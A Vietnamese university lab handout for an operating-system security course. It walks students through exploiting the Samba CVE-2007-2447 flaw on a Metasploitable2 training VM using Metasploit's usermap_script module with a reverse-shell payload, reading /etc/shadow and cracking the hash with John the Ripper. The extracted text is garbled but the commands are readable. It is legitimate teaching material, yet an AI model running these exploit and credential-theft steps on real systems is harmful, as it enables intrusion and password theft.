HỌC VIỆN CÔNG NGHỆ BƯU CHÍNH VIỄN THÔNG KHOA AN TOÀN THÔNG TIN Học phần: An toàn hệ điều hành Giảng viên: Hoàng Xuân Dậu Bài thực hành số: 01 Hà Nội, 03/2023... - Tạo một người dùng m
Trang 1HỌC VIỆN CÔNG NGHỆ BƯU CHÍNH VIỄN THÔNG
KHOA AN TOÀN THÔNG TIN
Học phần: An toàn hệ điều hành Giảng viên: Hoàng Xuân Dậu
Bài thực hành số: 01
Hà Nội, 03/2023
Trang 21 Mục đích
- Tìm hi u v các lể ề ỗ h ng mổ ột s d ch vố ị ụ, phần mềm trên HĐH
- Luy n th c hành t n công ki m soát h ệ ự ấ ể ệ thống ch y Ubuntu t xa s d ng công c tạ ừ ử ụ ụ ấn công Metasploit trên Kali Linux
2 Các phần m m, công c c n có ề ụ ầ
- Kali Linux
- Metasploit
- Metasploitable2: máy o VMWare ch a l i ả ứ ỗ
3 Tìm hi u v các l h ng bể ề ỗ ổ ảo mật trên m t s d ộ ố ịch v c a Ubuntu ụ ủ
- Metasploitable2 là m t máy ộ ảo VMWare được tích hợp nhiều d ch v ị ụ chứa các l i bỗ ảo
mật đã biết cho phép khai thác ki m soát h ể ệ thống t xa ph c v h c t p Danh sách cáừ ụ ụ ọ ậ
lỗ hổng và hướng dẫn khai thác có th tìm tể ại:
https://www.hackingarticles.in/comprehensive-guide-on- metasploitable-2/
- Lỗ h ng là l h ng b o m t CVE-2007-2447 trên d ch v chia s file SMB (Samba) vổ ỗ ổ ả ậ ị ụ ẻ ới các phiên bản Samba 3.0.0 đến 3.0.25rc3 có th cho phép th c thi mã t xa Chi ti t v ể ự ừ ế ề
lỗ h ng này có th tìm t i: ổ ể ạ https://nvd.nist.gov/vuln/detail/CVE-2007-2447
4 Nội dung th c hành ự
4.1 Cài đặt các công cụ n n t ề ảng
- Cài đặt Kali Linux (nếu chưa cài đặt) trên 1 máy o (ho c máy thả ặ ực)
- Đổi tên máy Kali Linux thành d ng Mã SV-Tên-Kali ạ
- Kiểm tra và ch y th b công c tạ ử ộ ụ ấn công MetaSploit
- Tải và cài đặt Metasploitable2 làm máy victim:
• S d ng VMWare Player hoử ụ ặc VMWare để mở và khởi động máy o Tài khoả ản đăng nhập vào h ệ thống là msfadmin / msfadmin
Trang 3- Tạo một người dùng m i trên máy ớ
- Tạo mới người dùng cho mình: ‘sudo useradd lqdat036’, trong đó ghép tên không dấu +
chữ cái đầu của họ đệm và 3 s mã sinh viên T o m t khố ạ ậ ẩu cho người dùng: ‘sudo passwd lqdat036’,
- Nh p mậ ật kh u mới 2 lần (lưu ý đặẩ t mật khẩu đơn giản và ngắn để có thể crack được)
- Đặ ạt l i tên máy ch a l i là Mã SV+Hứ ỗ ọ và tên Khởi động lại máy victim để máy nh n tên ậ
mới
4.2 Quét máy victim Metasploitable2 tìm các l hỗ ổ ng t n tại ồ
- Tìm địa chỉ IP của máy victim, kali:
• Chạy l nh trong c a s terminal: ệ ử ổ ‘ifconfig eth0’
• Tìm IP v4 interface eth0 mở ở ục ‘inet addr’
Trang 5- Kiểm tra k t nế ối m ng gi a các máy: ạ ữ
• Từ máy victim, ch y l nh ạ ệ ping <ip_máy kali>
• Từ máy Kali, ch y lạ ệnh ping <ip_máy victim>
- S d ng công c ử ụ ụ nmap để rà quét các lỗ h ng t n tổ ồ ại trên máy ch y Metasploitable2: ạ
• Quét c ng d ch v netbios-ssn cổ ị ụ ổng 139: ‘nmap script vuln -p139 <IP_máy
đích>’
Trang 6• Quét c ng d ch v microsoft-ds cổ ị ụ ổng 445: ‘nmap script vuln -p445 <IP_máy
đích>’
4.3 Khai thác tìm phiên bản Samba đang hoạt động:
- Khởi động Metasploit:
- Khai báo s dử ụng mô đun tấn công: ‘msf > use auxiliary/scanner/smb/smb_version ’
- Chạy l nh “show options” xem các thông tin v ệ để ề mô đun tấn công đang sử dụng
- Đặt địa ch IP máy victim: ỉ ‘msf > set RHOST <ip_victim> ’
- Thực thi t n công: ấ ‘msf > run’
Trang 7➔ Máy victim s t kê tên d ch v Samba và phiên bẽ liệ ị ụ ản -> khoanh đỏ thông tin phiên bản Samba
- Gõ lệnh exit để kết thúc
4.4 Khai thác lỗi trên Samba cho phép m shell ch y v ở ạ ới quy n root: ề
- Khởi động Metasploit
Khai báo s dử ụng mô đun tấn công: ‘msf > use exploit/multi/samba/usermap_script’
- Chạy l nh “show options” xem các thông tin v ệ để ề mô đun tấn công đang sử dụng
Trang 8- Đặt địa chỉ IP máy victim: ‘msf > set RHOST <ip_victim>’
- Chọn payload cho th c thi (m shell): ự ở ‘msf > set payload cmd/unix/reverse’
- Đặt 445 là c ng truy c p máy victim: ổ ậ ‘msf > set RPORT 445’
- Chạy l nh “show options” xem các thông tin v ệ để ề thiế ậ ấn công đang sử dụng t l p t
Trang 9- Thực thi t n công: ấ ‘msf > exploit’
➔ C a h u m ử ậ ở shell với người dùng root cho phép ch y l nh t máy Kali ạ ệ ừ
➔ có th ể thực hi n b t cệ ấ ứ l nh shell nào trên máy victim ệ
- Chạy các lệnh để đọc tên người dùng và máy đang truy cập:
whoami uname -a
- Lấy tên người dùng và m t khậ ẩu đã tạo ở m c 3.1: ụ
‘cat /etc/shadow | grep datlq036’, trong đó datlq036 là tên người dùng của mình đã tạo
Trang 10- Chọn và sao chép c ả dòng tên người dùng và m t khậ ẩu băm vào clipboard
- M mở ột c a s Terminal m i, ch y l nh: ử ổ ớ ạ ệ ‘nano password’
- Sau đó paste thông tin tên người dùng và m t khậ ẩu băm từ clipboard vào file password Gõ Ctrl-x để lưu vào file
- Crack để lấy mật khẩu s dử ụng chương trình john the ripper (hoặc 1 công cụ crack mật khẩu khác): ‘john show password ’ Chụp màn hình sao chép k t qu crack m t khế ả ậ ẩu
Trang 11- Gõ Ctrl-c để ế k t thúc
5 Yêu cầu cần đạt
a Thành thạo cài đặt và ch y máy o Ubuntu ạ ả
Trang 12b Thành th o s dạ ử ụng Metasploit để tấn công khai thác l h ng s dỗ ổ ử ụng thư viện có sẵn
c Chụp ảnh màn hình k t qu ế ả lưu vào file (hoặc giữ nguyên cửa s màn hình th c hi n): ổ ự ệ
- Màn hình quét các l hỗ ổng
- Màn hình phiên b n Samba ả
- Màn hình sau khi t n công thành công và ch y các l nh whoami và uname -a trên h ấ ạ ệ ệ thống victim (tên máy đặt lại theo yêu cầu);
- Màn hình ch y l nh cat trích xu t tên và m t khạ ệ ấ ậ ẩu người dùng
- Màn hình crack m t khậ ẩu